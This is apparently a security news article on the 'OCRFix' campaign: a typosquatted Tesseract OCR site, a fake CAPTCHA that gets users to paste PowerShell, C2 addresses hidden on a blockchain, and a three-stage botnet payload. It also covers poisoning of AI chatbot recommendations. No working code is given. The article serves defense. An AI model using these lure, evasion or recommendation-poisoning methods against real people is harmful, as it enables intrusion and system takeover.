OCRFix: When Fake CAPTCHAs, AI, and Blockchains Collide to Build a Botnet

A highly deceptive cyberattack is currently making the rounds, blending simple social engineering tricks with cutting-edge evasion tactics. Security researchers at CYJAX have uncovered a multi-stage malware campaign they have dubbed “OCRFix”. By impersonating a popular open-source tool, threat actors are tricking victims into handing over the keys to their systems, ultimately turning compromised machines into pawns within a larger botnet.

As the CYJAX report notes, “The combination of the well-known ClickFix technique with more advanced techniques such as EtherHiding gives a unique perspective on how threat actors can elevate their attack chains to target individuals.”

The attack begins with a classic typosquatting technique. The attackers set up a fake website at tesseract-ocr[.]com, designed to perfectly mimic the legitimate Optical Character Recognition (OCR) software known as Tesseract OCR. Because the legitimate tool is managed via a GitHub repository and does not have its own dedicated website, it became a prime target for domain impersonation.

What makes this initial trap unique is how victims are lured there. CYJAX discovered evidence that the malicious page utilized parameters linking back to ChatGPT. This strongly suggests the attackers are conducting LLM (Large Language Model) SEO poisoning, manipulating artificial intelligence tools into recommending the malicious site to users searching for OCR software. Additionally, analysis of the site’s code revealed elements commonly generated by AI, indicating this campaign was likely built with the assistance of LLMs.

Once a user lands on the fake website, they are presented with a familiar hurdle: a CAPTCHA verification prompt. However, this is where the “ClickFix” tactic comes into play.

Instead of clicking images of traffic lights, “Users were then instructed to open Windows PowerShell and paste a command into it to become verified.”. The malicious code is automatically copied to the victim’s clipboard the moment they interact with the fake CAPTCHA box. If the user follows the instructions and pastes the command into their terminal, the attack officially begins.

To keep the victim distracted, the site redirects them to the legitimate Tesseract GitHub page while the malware silently downloads in the background.

To keep their operation running, the hackers need a way to communicate with infected computers without security scanners blocking their servers. To achieve this, they are using a highly advanced technique.

As the CYJAX report explains, “This technique is known as EtherHiding and occurs when key information is hidden on blockchains such as Ethereum or BNB through smart contracts.”.

Specifically, the attackers use the BNB Smart Chain TestNet—a sandbox environment for blockchain developers—to host their Command and Control (C2) URLs within smart contracts. Because the malware queries a decentralized blockchain rather than a traditional hardcoded web address, security teams have a much harder time tracking and blocking the malicious traffic.

If the initial script runs successfully, it triggers a sophisticated, three-stage deployment process:

• The Loader (Update1.exe): The first executable queries the blockchain for a hidden address, downloads a disguised ZIP file, and unpacks the next stage of the malware.

• The Saboteur (setup_helper.exe): The second stage establishes persistence by creating scheduled tasks so the malware runs continuously. It also runs an encoded PowerShell script designed to severely weaken the system’s defenses, explicitly adding exclusion paths to Windows Defender and disabling mechanisms like BitLocker.

• The Listener (CfgHelper.exe): The final payload acts as a bot listener. It harvests system information (like the device name and IP address) and begins communicating with a central control panel hosted by the attackers. From this panel, the hackers can issue remote commands to the infected machine at any time.

The OCRFix campaign proves that no matter how complex the backend infrastructure—utilizing blockchains, AI-assisted code, and multi-stage payloads—the entire attack still relies on a human being making a mistake.

Because techniques like ClickFix are proving to be highly effective, the best defense is a mix of technical restriction and user education. Organizations should ensure employees are trained to never paste unknown commands into administrative terminals, and IT teams should look to restrict PowerShell access strictly to authorized personnel.